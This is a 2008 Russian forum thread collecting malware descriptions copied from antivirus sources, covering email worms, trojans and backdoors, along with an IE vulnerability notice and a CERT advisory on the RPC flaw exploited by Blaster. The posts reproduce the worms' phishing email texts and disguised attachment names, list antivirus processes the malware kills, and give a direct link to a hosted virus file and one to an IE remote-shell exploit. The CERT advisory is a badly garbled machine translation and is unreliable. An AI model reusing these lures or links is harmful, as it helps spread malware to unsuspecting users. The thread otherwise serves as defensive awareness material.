Сдесь будет выкладываться информация про вирусы.
ФЛУД и ФЛЕЙМ запрещен ! За нарушение БАН !
ОСТОРОЖНО!ВИРУС!
Сообщений 1 страница 15 из 15
Поделиться12008-09-07 14:08:39
Поделиться22008-09-07 14:09:30
I-Worm.Bagz.g
Вирус-червь, распространяющийся через интернет в виде вложений в зараженные электронные письма. Рассылается по всем найденным на зараженном компьютере адресам электронной почты.
Червь является приложением Windows (PE EXE-файл), имеет размер около 167КБ, упакован UPX. Размер распакованного файла около 200КБ.
Инсталляция
После запуска червь создает в системном каталоге Windows следующие файлы:
C:\WINDOWS\SYSTEM32\sysinfo32.exe
C:\WINDOWS\SYSTEM32\trace32.exe
Также червь копирует себя в системный каталог Windows с именем:
C:\WINDOWS\SYSTEM32\sqlssl.doc .exe
Затем червь создает запись в системном реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Xuy v palto]
Размножение через email
Червь ищет на диске файлы с расширениями из приведенного ниже списка и рассылает себя по всем найденным в них адресам электронной почты.
TBB
tbb
TBI
tbi
DBX
dbx
HTM
htm
TXT
txt
Для отправки почты червь использует прямое подключение к SMTP-серверу получателя.
Игнорируется отправка писем на адреса, содержащие строки:
@avp
@foo
@iana
@messagelab
@microsoft
abuse
admin
administrator@
all@
anyone@
bsd
bugs@
cafee
certific
certs@
contact@
contract@
feste
free-av
f-secur
gold-
gold-certs@
google
help@
hostmaster@
icrosoft
info@
kasp
linux
listserv
local
netadmin@
news
nobody@
noone@
noreply
ntivi
oocies
panda
pgp
postmaster@
rating@
root@
samples
sopho
spam
support
support@
unix
update
webmaster@
winrar
winzip
Характеристики зараженных писем
Тема письма:
Выбирается из списка:
ASAP
Administrator
Allert!
Amirecans
Att
attach
attachments
best regards
contract
Have a nice day
Hello
Money
office
please responce
re: Andrey
re: order
re: please
Read this
Russian's
text
toxic
urgent
Vasia
waiting
Warning
Текст письма:
Выбирается из списка:
Did you get the previous document I attached for you?
I resent it in this email just in case, because I
really need you to check it out asap.
Best Regards
Hi
I made a mistake and forgot to click attach
on the previous email I sent you. Please give me
your opinion on this opportunity when you get a chance.
Best Regards
Hi
I was supposed to send you this document yesterday.
Sorry for the delay, please forward this to your family if possible.
It contains important info for both of you.
Hi
Sorry, I forgot to send an important
document to you in that last email. I had an important phone call.
Please checkout attached doc file when you have a moment.
Best Regards
Hi
I was in a rush and I forgot to attach an important
document. Please see attached doc file.
Best Regards,
Sorry to bother you, but I am having a problem receiving your emails.
I am responding to your last email in the attached file.
Please get back to me if there is any problem reading the attachment.
I am responding to your last email in the attached file.
I had a delivery problem with your inbox, so maybe you'll receive this now.
Can you please check out the email I have attached?
For some reason, I received only part of your last several emails.
I want to make sure that there are no problems with either of our accounts.
This email is being sent as attachment because
it was previously blocked by your email filters.
Please view the attachment and respond.
Thanks
I resent this email as attachment because
it was previously blocked by your email filters.
Please read the attachment and respond.
Thanks
I apologize, but I need you to verify
that I have the correct contact info for you.
My system crashed last weekend and
I lost most of my friends and work contacts.
Please check the attached (.pdf) and
please let me know if your info is current.
My last email to you was returned.
The reason is that I am not currently
added to your allowed contact list.
Please add my updated contact info
provided in the attached (.pdf) file
so I can send you emails in the future.
Sincerely
I have updated my email address
See the (.pdf) file attached and
please respond if you have any questions.
We have made recent updates to our database.
Please verify your mailing address on file is correct.
We have attached a (.pdf) sheet for you to use for your response.
Hello
Our contact information has changed.
See the attached (.pdf) sheet for details.
Sincerely,
***URGENT: SERVICE SHUTDOWN NOTICE***
Due to your failure to comply with our email
Rules and Regulations, your email account has been
temporarily suspended for 24 hours unless we are contacted regarding
this situation.
You must read the attached document for further
instructions. Failure to comply will result in termination of your account.
Regards,
Net Operator
***URGENT: SERVICE SHUTDOWN NOTICE***
***ATTENTION: YOUR EMAIL IS NOT BEING DELIVERED!***
You are currently unable to send emails.
This may be a billing issue.
Please call the billing center.
The # for the billing office is located in the attached
contact list for your convenience.
***ATTENTION: YOUR EMAIL IS NOT BEING DELIVERED!***
***YOUR MESSAGE HAS BEEN RECOGNIZED AS SPAM***
Hello,
The previous email you sent has been recognized as spam.
This means your email was not delivered to your friend or client.
You must open the attached file to receive more information.
***YOUR MESSAGE HAS BEEN RECOGNIZED AS SPAM***
Hello,
What version of windows you are using?
This last document I received from you came out weird.
Please see the attached word file and resend the file to me.
Many thanks,
User
Hello,
My PC crashed while I was sending that last email.
I have re-attached the document of yours that I discovered.
Please read attached document and respond ASAP.
Sincerely,
User
Hello,
Your email was sent in an INVALID format.
To verify this email was sent from you,
simply open the attached email (.eml) file
and click yes in the sender options box.
Thank You,
User
Hello,
Your email was received.
YOUR REPLY IS URGENT!
Please view the attached text file for instructions.
Regards,
User
Hello,
I was in a hurry and I forgot to attach an important
document. Please see attached.
Best Regards,
User
Hello,
I resent this email as attachment because
it was previously blocked by your email filters.
Please read the attachment and respond.
Thanks,User
Hello,
Sorry, I forgot to attach the new contact information.
Please view the attached (.pdf) contact sheet.
Sincerely, User
Имя файла-вложения:
Выбирается из списков:
about.zip
admin.zip
archivator.zip
archives.zip
ataches.zip
backup.zip
docs.zip
documentation.zip
help.zip
inbox.zip
manual.zip
outbox.zip
payment.zip
photos.zip
rar.zip
readme.zip
save.zip
zip.zip
about.doc .exe
admin.doc .exe
archivator.doc .exe
archives.doc .exe
ataches.doc .exe
backup.doc .exe
docs.doc .exe
documentation.doc .exe
help.doc .exe
inbox.doc .exe
manual.doc .exe
outbox.doc .exe
payment.doc .exe
photos.doc .exe
rar.doc .exe
readme.doc .exe
save.doc .exe
sqlssl.doc .exe
zip.doc .exe
Действие
I-Worm.Bagz.g изменяет файл "%System%\DRIVERS\ETC\HOSTS" и дописывает в него следующий текст, запрещая доступ к следующим ресурсам:
127.0.0.1 ad.doubleclick.net
127.0.0.1 ad.fastclick.net
127.0.0.1 ads.fastclick.net
127.0.0.1 ar.atwola.com
127.0.0.1 atdmt.com
127.0.0.1 avp.ch
127.0.0.1 avp.com
127.0.0.1 avp.ru
127.0.0.1 awaps.net
127.0.0.1 banner.fastclick.net
127.0.0.1 banners.fastclick.net
127.0.0.1 ca.com
127.0.0.1 click.atdmt.com
127.0.0.1 clicks.atdmt.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 download.microsoft.com
127.0.0.1 downloads.microsoft.com
127.0.0.1 engine.awaps.net
127.0.0.1 fastclick.net
127.0.0.1 f-secure.com
127.0.0.1 ftpf-secure.com
127.0.0.1 ftpsophos.com
127.0.0.1 go.microsoft.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 localhost
127.0.0.1 mast.mcafee.com
127.0.0.1 mcafee.com
127.0.0.1 media.fastclick.net
127.0.0.1 msdn.microsoft.com
127.0.0.1 my-etrust.com
127.0.0.1 nai.com
127.0.0.1 networkassociates.com
127.0.0.1 office.microsoft.com
127.0.0.1 phx.corporate-ir.net
127.0.0.1 secure.nai.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 service1.symantec.com
127.0.0.1 sophos.com
127.0.0.1 spd.atdmt.com
127.0.0.1 support.microsoft.com
127.0.0.1 symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 updates.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 vil.nai.com
127.0.0.1 viruslist.ru
127.0.0.1 windowsupdate.microsoft.com
127.0.0.1 wwwavp.ch
127.0.0.1 wwwavp.com
127.0.0.1 wwwavp.ru
127.0.0.1 wwwawaps.net
127.0.0.1 wwwca.com
127.0.0.1 wwwfastclick.net
127.0.0.1 wwwf-secure.com
127.0.0.1 wwwkaspersky.ru
127.0.0.1 wwwmcafee.com
127.0.0.1 wwwmy-etrust.com
127.0.0.1 wwwnai.com
127.0.0.1 wwwnetworkassociates.com
127.0.0.1 wwwsophos.com
127.0.0.1 wwwsymantec.com
127.0.0.1 wwwtrendmicro.com
127.0.0.1 wwwviruslist.ru
127.0.0.1 www3.ca.com
Червь удаляет из системного реестра ключи, содержащие следующие строки:
804mbd1.chk
804mbd1.img
aboutplg.dll
alert.zap
appinit.ini
apwcmdnt.dll
apwutil.dll
ashavast.exe
ashbug.exe
ashchest.exe
ashdisp.exe
ashldres.dll
ashlogv.exe
ashmaisv.exe
ashpopwz.exe
ashquick.exe
ashserv.exe
ashsimpl.exe
ashskpcc.exe
ashskpck.exe
aswboot.exe
aswregsvr.exe
aswupdsv.exe
avcompbr.dll
avres.dll
bootwarn.exe
camupd.dll
ccavmail.dll
ccimscan.dll
ccimscn.exe
cerbprovider.pvx
cfgwiz.exe
cfgwzres.dll
defalert.dll
djsalert.dll
dunzip32.dll
edisk.dll
email.zap
emscnres.dll
filter.zap
firewall.zap
framewrk.dll
ftscnres.dll
idlock.zap
imscnbin.inf
imscnres.inf
ltchkres.dll
mcappins.exe
mcavtsub.dll
mcinfo.exe
mcmnhdlr.exe
mcscan32.dll
mcshield.dll
mcshield.exe
mcurial.dll
mcvsctl.dll
mcvsescn.exe
mcvsftsn.exe
mcvsmap.exe
mcvsrte.exe
mcvsscrp.dll
mcvsshl.dll
mcvsshld.exe
mcvsskt.dll
mcvsworm.dll
mghtml.exe
mpfagent.exe
mpfconsole.exe
mpfservice.exe
mpftray.exe
mpfupdchk.dll
mpfwizard.exe
mvtx.exe
n32call.dll
n32exclu.dll
naiann.dll
naievent.dll
navap32.dll
navapscr.dll
navapsvc.exe
navapw32.dll
navapw32.exe
navcfgwz.dll
navcomui.dll
naverror.dll
navevent.dll
navlcom.dll
navlnch.dll
navlogv.dll
navlucbk.dll
navntutl.dll
navoptrf.dll
navopts.dll
navprod.dll
navshext.dll
navstats.dll
navstub.exe
navtasks.dll
navtskwz.dll
navui.dll
navui.nsi
navuihtm.dll
navw32.exe
navwnt.exe
netbrext.dll
ntclient.dll
oeheur.dll
officeav.dll
opscan.exe
outscan.dll
outscres.dll
patch25d.dll
patchw32.dll
persfw.exe
pfui.dll
pfwadmin.exe
probegse.dll
programs.zap
ptchinst.dll
qconres.dll
qconsole.exe
qspak32.dll
quar32.dll
quarantine
quaropts.dat
s32integ.dll
s32navo.dll
savrt.sys
savrt32.dll
savrtpel.sys
savscan.exe
scan.dat
scandlvr.dll
scandres.dll
scanmgr.dll
scanserv.dll
sched.exe
scriptui.dll
scrpres.dll
scrpsbin.inf
scrstres.inf
sdpck32i.dll
sdsnd32i.dll
sdsok32i.dll
sdstp32i.dll
security.zap
shextbin.inf
shextres.inf
shlres.dll
ssleay32.dll
statushp.dll
symnavo.dll
tutorwiz.dll
vsagntui.dll
vsavpro.dll
vsdb.dll
vsmon.exe
vsoui.dll
vsoupd.dll
vsowow.dll
vsruledb.dll
vsvault.dll
wormres.dll
zatutor.exe
zauninst.exe
zav.zap
zl_priv.htm
zlclient.exe
zlparser.dll
zonealarm.exe
Информация взята с http://www.avp.ru/
Поделиться32008-09-07 14:10:00
-Worm.Skybag.a
Вирус-червь, распространяющийся через интернет в виде вложений в зараженные электронные письма, а также через локальную и файлообменные сети.
Рассылается по всем найденным на зараженном компьютере адресам электронной почты.
Червь представляет собой PE EXE-файл, размером 205КБ.
Инсталляция
Во время запуска червь может выводить сообщение:
Windows encountered an error reading the file
После запуска червь копирует себя в системный каталог Windows с именами:
bloodred.exe
Windows_kernel32.exe
Также в системном каталоге Windows червь создает следующие файлы:
base64exe.sys
base64zip.sys
frun.txt
В каталоге Windows червь создает файл "bloodred.zip".
I-Worm.Skybag.a регистрирует себя в ключе автозапуска системного реестра:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Kernel"="%System%\Windows_kernel32.exe"
Распространение через email
Для поиска адресов жертв червь сканирует адресную книгу Outlook, а также ищет адреса в файлах со следующими расширениями:
adb
asp
dbx
doc
htm
html
jsp
rtf
txt
xml
Для отправки почты червь использует прямое подключение к SMTP-серверу получателя.
Игнорируется отправка писем на адреса, содержащие строки:
@avp
@fsecure
@hotmail
@microsoft
@mm
@msn
@noreply
@norman
@norton
@panda
@sopho
@symantec
@virusli
Характеристики зараженных писем
Адрес отправителя:
Выбирается из списка:
administration@<домен получателя>
management@<домен получателя>
server@<домен получателя>
service@<домен получателя>
userhelp@<домен получателя>
Тема письма:
Выбирается из списка:
Detailed Information
Email Account Information
Server Error
URGENT PLEASE READ!
Urgent Update!
User Info
User Information
Поделиться42008-09-07 14:13:33
Backdoor.WinCE.Brador.a (для КПК)
Инфо старое (01.10.04), но полезное!
У владельцев КПК на платформе Windows Mobile появился серьёзный повод озаботиться обеспечением безопасности своих налодонников. Антивирусная компания «Лаборатория Касперского» сообщила об обнаружения вредоносной программы для КПК под названием Backdoor.WinCE.Brador.a, которая представляет собой утилиту удаленного администрирования (backdoor). После запуска программа размером 5632 байта создаёт свой файл с именем svhost.exe в каталоге запуска ОС и получает полное управление системой при каждом включении КПК. При наличии подключении к Интернету WinCE.Brador.a определяет IP-адрес заражённой систему и отправляет его по электронной почте своему автору. Получив сообщение, злоумышленник знает, что поражённый КПК находится в Сети и программа удаленного управления активна.
Затем Троян открывает на КПК порт 44299 для приёма различных команд со стороны злоумышленника. В итоге хакер может получить полный контроль над подключённым к Сети КПК. Помимо функций автозагрузки и удаленного управления, программа удаляет или создаёт файлы, а так же пересылает их злоумышленнику. К счастью Brador.a не имеет функции самораспространения и может попасть на чужой компьютер только под видом другой безобидной программы в виде вложения в электроном письме или просто файла, переданного из настольного ПК или из Интернета.
По данным аналитиков «Лаборатории Касперского», автором WinCE.Brador.a может быть российский вирусописатель. Такой вывод сделали в связи с тем, что информация о появлении программы поступила с российского адреса электронной почты и текст сообщения был составлен на русском языке. Особые опасения борцам с вирусной угрозой внушает тот факт, что программа комерцеская0 то есть автор продаёт её всем желающим.
Поделиться52008-09-07 14:13:54
Вирус выдаёт себя за программу ICQFLOOD.EXE ...
Место хранения
ICQFLOOD.EXE
c:\System Volume Information\_restore{01044B79-4E53-4EBF-87C3-A5011A78ABE1}\RP47\A0017428 .exe
A0017428.exe
c:\System Volume Information\_restore{01044B79-4E53-4EBF-87C3-A5011A78ABE1}\RP47
A0017429.EXE
c:\System Volume Information\_restore{01044B79-4E53-4EBF-87C3-A5011A78ABE1}\RP47
Расшерение
.exe
.EXE
.sfx.exe
Этот вирус распологается на данной ссылки http://hacksss2.stsland.ru/icqflood.sfx.exe ...
Поделиться62008-09-07 14:22:18
Обход ограничений в Microsoft IE на Windows XP SP2
Программа: Microsoft IE на Windows XP SP2
Опасность: Высокая
Наличие эксплоита: Нет
Описание:
Обнаружено несколько уязвимостей в Microsoft Internet Explorer. Удаленный атакующий может получить полный контроль над уязвимой системой.
Удаленный атакующий может создать специальным образом злонамеренную страницу, с помощью которой он сможет загрузить и выполнить произвольный файл на уязвимой системе. Подробности неизвестны.
URL производителя: wwwmicrosoft.com
Решение: Решение на данный момент не существует.
Microsoft Internet Explorer on XP SP2 Has Unspecified Flaws That Let Remote Users Bypass File Download Restrictions
Finjan issued a press release reporting several vulnerabilities in Microsoft Windows
XP SP2. According to the report, a remote user can create a specially crafted web
page that, when loaded by the target user, will silently take full control of the
target user's system.
> Hackers can remotely access users' local files
> Hackers can switch between Internet Explorer Security Zones to obtain rights of
> local zone
> Hackers can bypass SP2’s notification mechanism on the download and execution of
> EXE files and therefore download files without any warning or notification
Поделиться72008-09-07 14:25:04
Microsoft Internet Explorer IFRAME Tag Overflow Exploit
Цель эксплоита: Interner Explorer
Воздействие эксплоита: Remote Shell
Скачать эксплоит: http://www.securitylab.ru/_Exploits/200 … e.html.txt
Новая версия интернет-червя MyDoom
Новая версия компьютерного червя MyDoom использует незакрытую брешь в Microsoft Internet Explorer. Недавно обнаруженная уязвимость в IE позволяет вирусу проникать на компьютер пользователя после клика по гиперссылке в зараженном письме. В теле письма содежится призыв загрузить фото- или видеоизображения.
После клика, на Windows-машину загружается Internet Explorer и специально изготовленная веб-страница, использующая IFrame-уязвимость. Затем исполняется вредоносная программа. После заражения системы вирус распространяет себя по найденным адресам электронной почты, создает веб-сервер и использует некоторые ретранслируемые чаты для оповещения вирусописателя о заражении нового компьютера.
Поделиться82008-09-07 14:32:09
Trojan.Webus.D
Trojan.Webus.D – троянская программа, которая соединяется с IRC сервером и открывает “черный ход” на скомпрометированной систме.
При запуске Trojan.Webus.D выполняет следующие действия:
1.Копирует себя в %System%\lsvchost.exe.
2.Создает мьютекс с названием "3586E64A-W323-121E-BFC6-083C2BF2S511", чтобы убедиться что только один Троян выполняется на скомпрометированной системе.
3.Добавляет значения :
".mscdr"="%System%\lsvchost.exe"
В ключи реестра:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
4. Открывает случайный TCP порт на локальной машине и ждет входящих соединений. Может открыть прокси соединение с другим хостом.
5. Открывает “черный ход” на 1088 TCP порту для соединения с одним из следующих IRC серверов :
serv.gigaset.org
gimp.robobot.org
Затем Троян может посылать команды удаленному атакующему для выполнения ряда действий, включая скачивание и выполнение произвольных файлов.
Поделиться92008-09-07 14:54:33
Вот ещё!
TrojanSpy.Win32.Montp.l
Троянская программа-шпион. Является приложением Windows (PE EXE-файл), упакована UPX. Размер упакованного файла - около 20KB.
При инсталляции "троянец" создает в системной папке Windows директорию "mset". В этой директории "троянец" создает свою копию с именем "svchost.exe".
Также создаются файлы "_mails.txt" и "_pass.log", в которых собирается вся информация о зараженном компьютере. Полученную информацию троянец выкладывает на FTP-сервер злоумышленника.
Троянская программа регистрирует себя в ключе автозагрузки системного реестра:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"mset"="%Windir%\%System%\mset\svchost.exe"
Также в системной папке Windows "троянец" создает следующие файлы:
C:\WINDOWS\SYSTEM32\kwuie_x.dll
C:\WINDOWS\SYSTEM32\xtempx.xxx
После запуска троянец выдает следующее окно:
http://www.securitylab.ru/images/virus/montp_l_1_s.gif
TrojanSpy.Win32.Montp.l пытается остановить работу следующих процессов:
_AVP32.EXE
_AVPCC.EXE
_AVPM.EXE
ACKWIN32.EXE
ANTI-TROJAN.EXE
APVXDWIN.EXE
ARMOR2NET.EXE
AUTODOWN.EXE
AVCONSOL.EXE
AVE32.EXE
AVGCTRL.EXE
AVKSERV.EXE
AVNT.EXE
AVP.EXE
AVP32.EXE
AVPCC.EXE
AVPDOS32.EXE
AVPM.EXE
AVPTC32.EXE
AVPUPD.EXE
AVSCHED32.EXE
AVWIN95.EXE
AVWUPD32.EXE
BLACKD.EXE
BLACKICE.EXE
CFIADMIN.EXE
CFIAUDIT.EXE
CFINET.EXE
CFINET32.EXE
CLAW95.EXE
CLAW95CF.EXE
CLEANER.EXE
CLEANER3.EXE
DVP95.EXE
DVP95_0.EXE
ECENGINE.EXE
ESAFE.EXE
ESPWATCH.EXE
F-AGNT95.EXE
FINDVIRU.EXE
FPROT.EXE
F-PROT.EXE
F-PROT95.EXE
FP-WIN.EXE
FRW.EXE
F-STOPW.EXE
IAMAPP.EXE
IAMSERV.EXE
IBMASN.EXE
IBMAVSP.EXE
ICLOAD95.EXE
ICLOADNT.EXE
ICMON.EXE
ICSUPP95.EXE
ICSUPPNT.EXE
IFACE.EXE
IOMON98.EXE
JEDI.EXE
LOCKDOWN2000.EXE
LOOKOUT.EXE
LUALL.EXE
MOOLIVE.EXE
MPFTRAY.EXE
N32SCANW.EXE
NAVAPW32.EXE
NAVLU32.EXE
NAVNT.EXE
NAVW32.EXE
NAVWNT.EXE
NISUM.EXE
NMAIN.EXE
NORMIST.EXE
NPROTECT.EXE
NUPGRADE.EXE
NVC95.EXE
NVSVC32.EXE
OUTPOST.EXE
PADMIN.EXE
PAVCL.EXE
PAVSCHED.EXE
PAVW.EXE
PCFWALLICON.EXE
PCWIN98.EXE
PERSFW.EXE
RAV7.EXE
RAV7WIN.EXE
RESCUE.EXE
SAFEWEB.EXE
SAVSCAN.EXE
SCAN32.EXE
SCAN95.EXE
SCANPM.EXE
SCRSCAN.EXE
SERV95.EXE
SMC.EXE
SPHINX.EXE
SWEEP95.EXE
TBSCAN.EXE
TCA.EXE
TDS2-98.EXE
TDS2-NT.EXE
VET95.EXE
VETTRAY.EXE
VSCAN40.EXE
VSECOMR.EXE
VSHWIN32.EXE
VSSTAT.EXE
WEBSCANX.EXE
WFINDV32.EXE
ZONEALARM.EXE
Поделиться102008-09-07 14:59:47
Backdoor.Selka
Backdoor.Selka - это бэкдор, который позволяет получить удаленный доступ на зараженный компьютер.
При запуске Backdoor.Selka выполняет следующие действия:
1.Копирует себя в %System%\WIN32SVC.EXE.
2.Создает сервис со следующими свойствами:
Service Name: win32svc
Display Name: Win32 service
3.Создает следующие подключи реестра:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\win32svc
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Enum\Root\LEGACY_WIN32SVC
HKEY_LOCAL_MACHINE\Software\Netmaniac\aSeLka\iNfecTeD
4.Открывает 33333 TCP порт для связи с удаленным атакующим. Установя соединение, бэкдор создает командную оболочку под названием cmd.exe и ждет команд.
5.Использует собственный SMTP сервер для того, чтобы послать письмо атакующему через почтовый сервер mxs.mail.ru.
Email имеет следующие характеристики:
From:
sweetamy@bk.ru
To:
sweetamy@bk.ru
Subject:
-= iNfEcTeD hOsT [infected computer name] [infected user name] =-
Message text:
(various system information)
Поделиться112008-09-07 15:02:35
• Рекомендации CERT по LoveSan:
ПЕРВАЯ
СВИДЕТЕЛЬСТВО - Консультативная CA-2003-19 Эксплуатация Уязвимости в Microsoft RPC Интерфейс
Первоначальная(Оригинальная) дата проблемы(выпуска): 31 июля 2003
Последний пересмотренный: 31 июля 2003 21:25 UTC-0400
Источник: СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ
Полная история пересмотра - в конце этого файла.
Системы, которые затрагивают
Windows NT Microsoft 4.0
Windows NT Microsoft 4.0 Предельных Издания Услуг
Windows 2000 Microsoft
Windows Microsoft XP
Сервер Windows Microsoft 2003
Краткий обзор
СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ получает сообщения широко распространенного просмотра и эксплуатации двух недавно обнаруженной уязвимости в Microsoft Отдаленный Запрос Процедуры (RPC) Интерфейс.
I. Описание
Сообщения к СВИДЕТЕЛЬСТВУ/МАШИНОПИСНОЙ КОПИИ указывают, что злоумышленники активно просматривают для и эксплуатируют уязвимость в DCOM Microsoft RPC интерфейс как описано в VU*568148 <http://www.kb.cert.org/vuls/id/568148> и CA-2003-16 <http://www.cert.org/advisories/CA-2003-16.html>. Многократные деяния для этой уязвимости были публично выпущены, и есть активное развитие улучшенных и автоматизированных инструментов деяния для этой уязвимости. Известная цель деяний TCP порт 135 и создает привилегированный закулисный снаряд(раковину) команды на успешно компрометированных хозяевах. Некоторые версии деяния используют TCP порт 4444 для задней двери, и другие версии используют TCP число(номер) порта, указанное злоумышленником во времени выполнения. Мы также получили сообщения просмотра деятельности для общих(обычных) закулисных портов типа 4444/TCP. В некоторых случаях, из-за завершения обслуживания(службы) RPC, ставившая под угрозу(скомпрометированная) система может переботинок после того, как к задней двери обращается злоумышленник.
Кажется, будет отдельная уязвимость опровержения-обслуживания в интерфейсе RPC Microsoft, который также преследуется. Базируемый на текущей информации, мы полагаем, что эта уязвимость является отдельной и независимой от RPC уязвимости, к которой обращаются(адресуют) вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>. СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ отслеживает эту дополнительную уязвимость какVU*326746 <http://www.kb.cert.org/vuls/id/326746> и продолжает работать, чтобы понять стратегии уменьшения и проблему(выпуск). Кодекс деяния для этой уязвимости был публично выпущен и также цели TCP порт 135.
В обоих из нападений, описанных выше, TCP сессия к порту 135 используется, чтобы выполнить нападение. Однако, доступ к TCP портам 139 и 445 может также обеспечить векторы нападения и нужно рассмотреться(счесть) при применении(обращении) стратегий уменьшения.
II. Воздействие
Отдаленный нападавший мог эксплуатировать эту уязвимость, чтобы выполнить произвольный кодекс с Местными привилегиями Системы или причинять опровержение условия(состояния) обслуживания(службы).
III. Решения
Примените заплаты
Все пользователи поощрены применить заплаты, упомянутые в Бюллетене Безопасности MicrosoftMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>как можно скорее чтобы смягчить уязвимость, описанную вVU*568148 <http://www.kb.cert.org/vuls/id/568148>. Эти заплаты также доступны черезМодернизацию WindowsMicrosoft<http://windowsupdate.microsoft.com/>обслуживают.
Системы, управляющие Windows 2000 могут все еще быть уязвимы к по крайней мере опровержению нападения обслуживания(службы) черезVU*326746 <http://www.kb.cert.org/vuls/id/326746>, если их DCOM RPC обслуживание(служба) доступен через сеть. Поэтому, участки(сайты) поощрены использовать подсказки(чаевые) фильтрования пачки ниже в дополнение к применению(обращению) заплат, снабженных вMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Движение сети фильтра
Участки(Сайты) поощрены блокировать доступ сети к обслуживанию(службе) RPC в границах сети. Это может минимизировать потенциал нападений опровержения-обслуживания, происходящих снаружи периметра. Определенные услуги, которые должны быть блокированы, включают
135/TCP
135/UDP
139/TCP
139/UDP
445/TCP
445/UDP
Если доступ не может быть блокирован для всех внешних хозяев, свидетельство/МАШИНОПИСНАЯ КОПИЯ рекомендует доступ ограничения только тем хозяевам, которые требуют этого для нормального действия. Как правило, свидетельство/МАШИНОПИСНАЯ КОПИЯ рекомендует фильтрованию все типы движения сети, которые не требуются для нормального действия.
Поскольку текущие деяния дляVU*568148 <http://www.kb.cert.org/vuls/id/568148> создают заднюю дверь, которая является в некоторых случаях 4444/TCP, блокируя прибывающие TCP сессии к портам, на которых никакие законные услуги не обеспечены, может ограничить доступ злоумышленника компрометированными хозяевами.
Восстановление от компромисса системы
Если Вы полагаете, что система при вашем административном контроле(управлении) была скомпрометирована, пожалуйста следуйте за шагами, выделенными в
Шаги для того, чтобы Оправляться от UNIX или NT Компромисса Системы <http: // wwwcert.org/tech_tips/win-UNIX-system_compromise.html>
Сообщение
СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ отслеживает деятельность, связанную с эксплуатацией первой уязвимости (VU*568148 <http://www.kb.cert.org/vuls/id/568148> как CERT*27479 и второй уязвимости (VU*326746 <http://www.kb.cert.org/vuls/id/326746> как CERT*24523. Уместным экспонатам или деятельности можно послать cert@cert.org с соответствующим СВИДЕТЕЛЬСТВОМ * на подчиненной линии.
Приложение A. Информация Продавца
Это приложение содержит информацию, обеспеченную продавцами. Когда продавцы сообщают о новой информации, эта секция обновлена, и изменения(замены) отмечены в истории пересмотра. Если продавец не упомянут ниже, мы не получили их комментарии.
Microsoft <http: // wwwmicrosoft.com/>
Пожалуйста см. Бюллетень Безопасности MicrosoftMS03-026 <http://microsoft.com/technet/security/bulletin/MS03-026.asp>.
Приложение B. Ссылки(рекомендации)
Примечание Уязвимости СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ VU*561284 - <http://www.kb.cert.org/vuls/id/561284>
Примечание Уязвимости СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ VU*326746 -<http://www.kb.cert.org/vuls/id/326746>
Бюллетень Безопасности Microsoft MS03-026 -<http://microsoft.com/technet/security/bulletin/MS03-026.asp>
Статья(Изделие) Основы Знания Microsoft 823980 -<http: // support.microsoft.com? kbid=823980>
Авторы:Чад Dougherty и Кевин Ху <mailto:cert@cert.org? subject=CA-2003-19%20Feedback>
Этот документ доступен от:<http://www.cert.org/advisories/CA-2003-19.html>
Информация Контакта СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ
Пошлите по электронной почте: cert@cert.org <mailto:cert@cert.org>
Звоните: +1 412-268-7090 (24-часовая экстренная связь)
Факс: +1 412-268-6989
Почтовый адрес:
Центр Координации СВИДЕТЕЛЬСТВА
Институт Разработки Программного обеспечения
Carnegie Mellon Университет
Питсбург Пенсильвания 15213-3890
США.
Персонал СВИДЕТЕЛЬСТВА/МАШИНОПИСНОЙ КОПИИ отвечает на экстренную связь 08:00-17:00 восточное стандартное время (5 ПО ГРИНВИЧУ) / ПО ВОСТОЧНОМУ ВРЕМЕНИ (4 ПО ГРИНВИЧУ) с понедельника до пятницы; они находятся на призыве к критическому положению в течение других часов, на американском отпуске, и по уикэндам.
Использование шифрования
Мы настоятельно убеждаем Вас зашифровать чувствительную информацию, посланную электронной почтой. Наша публика PGP ключ доступна от
<http://www.cert.org/CERT_PGP.key>
Если Вы предпочитаете использовать DES, пожалуйста назовите(вызовите) экстренную связь СВИДЕТЕЛЬСТВА за дополнительной информацией.
Получение информации безопасности
Публикации СВИДЕТЕЛЬСТВА и другая информация безопасности доступны от нашего вебсайта
<http://www.cert.org/>
* "СВИДЕТЕЛЬСТВО" и "Центр Координации СВИДЕТЕЛЬСТВА" зарегистрировано в американском Патенте и Офисе Торговой марки.
НИКАКАЯ ГАРАНТИЯ
Любой материал, снабженный(доставленный) Carnegie Mellon Университет и Институт Разработки Программного обеспечения снабжен(доставлен) на, "как-" основание. Carnegie Mellon Университет не делает никаких гарантий любого вида, или выраженный или подразумеваемый относительно любого вопроса, включая, но не ограниченными, гарантия пригодности(соответствия) для специфической цели или высокого спроса, исключительности или результатов, полученных от использования материала. Carnegie Mellon Университет не делает никакой гарантии любого вида относительно свободы от патента, торговой марки, или нарушения авторского права.
Поделиться122008-09-07 15:05:13
• Рекомендации CERT по LoveSan:
ВТОРАЯ
СВИДЕТЕЛЬСТВО - Консультативный CA-2003-20 W32/Blaster червь
Первоначальная(Оригинальная) дата проблемы(выпуска): 11 августа 2003
Последний пересмотренный: 14 августа 2003
Источник: СВИДЕТЕЛЬСТВО/МАШИНОПИСНАЯ КОПИЯ
Полная история пересмотра - в конце этого файла.
